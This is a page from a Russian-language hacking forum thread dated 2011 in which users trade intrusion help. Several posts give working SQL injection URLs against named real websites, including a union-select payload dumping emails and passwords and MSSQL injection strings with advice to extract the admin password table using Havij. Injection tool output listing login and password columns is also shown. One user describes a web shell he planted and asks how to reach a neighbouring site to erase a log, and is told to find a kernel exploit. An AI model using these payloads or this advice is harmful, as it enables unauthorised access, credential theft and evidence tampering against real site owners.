HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18961  
Старый 21.12.2011, 19:46
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
о, спасибо, а чё ето за чудо конструкция??
http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+
где я могу почитать о том что ето (@x:=0x 00) и тп, означает?
http://mysql.ru/docs/man/Variables.html
 
Ответить с цитированием

  #18962  
Старый 21.12.2011, 19:58
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию

вопрос технического характера, как отследить HTTPS запрос?
 
Ответить с цитированием

  #18963  
Старый 21.12.2011, 20:47
DarkMaster
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме:
194

Репутация: 0
По умолчанию

Подскажите, здесь есть уязвимость, или только раскрытие путей:

saturn.net/contacts.php?id=4%27

уж больно пути странные пишет...
 
Ответить с цитированием

  #18964  
Старый 21.12.2011, 22:11
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию

Подскажите... есть сайт, есть форма. Фильтр на иньекцию -

Код:
Code:
function is_secure($string)
			{
			
			//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
				$pattern = "#[^A-Za-z0-9]#";	
				
					if(@preg_match($pattern,$string)==true) return false;
						else
							return true;
			}
Если делаем так :

Код:
Code:
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
 
Ответить с цитированием

  #18965  
Старый 21.12.2011, 22:21
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от DeepBlue7  
DeepBlue7 said:
Подскажите... есть сайт, есть форма. Фильтр на иньекцию -
Код:
Code:
function is_secure($string)
			{
			
			//todo : better one (maybe, have to check) ver 1 : seems 2 be fine (only a-z 0-9)
				$pattern = "#[^A-Za-z0-9]#";	
				
					if(@preg_match($pattern,$string)==true) return false;
						else
							return true;
			}
Если делаем так :
Код:
Code:
preg_match обламывается на том, что ему передаётся массив, а не стринг. Можно ли что-нибудь кроме раскрытия путей замутить ?
нельзя
 
Ответить с цитированием

  #18966  
Старый 21.12.2011, 23:01
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от DarkMaster  
DarkMaster said:
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
Только раскрытие путей.

Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:

http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+

http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1

а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки

Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6

Column found: FullName

Column found: id

Column found: isEnabled

Column found: isSuperUser

Column found: Login

Column found: Password
 
Ответить с цитированием

  #18967  
Старый 22.12.2011, 11:24
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

http://www.kupibt.ru/catalogue/ID_19467

А эту как?
 
Ответить с цитированием

  #18968  
Старый 22.12.2011, 14:29
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
http://www.kupibt.ru/catalogue/ID_19467
А эту как?
А где ты тут скулю видишь?
 
Ответить с цитированием

  #18969  
Старый 22.12.2011, 15:19
Unknown
Guest
Сообщений: n/a
Провел на форуме:
42706

Репутация: 6
По умолчанию

Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
 
Ответить с цитированием

  #18970  
Старый 22.12.2011, 15:22
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от alerondel  
alerondel said:
Имею 2 сайта на 1м IP адресе,обычный сайт и форум IPB,в форум IPВ я залил шелл,мне нужно попасть на 1й сайт,чтобы почистить там 1 лог файл..есть варианты как переместиться на 1й сайт?..шелл определяет пути и т.п к 1му сайту но туда пройти не может.
Смотри версию ядра и ищи сплоит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ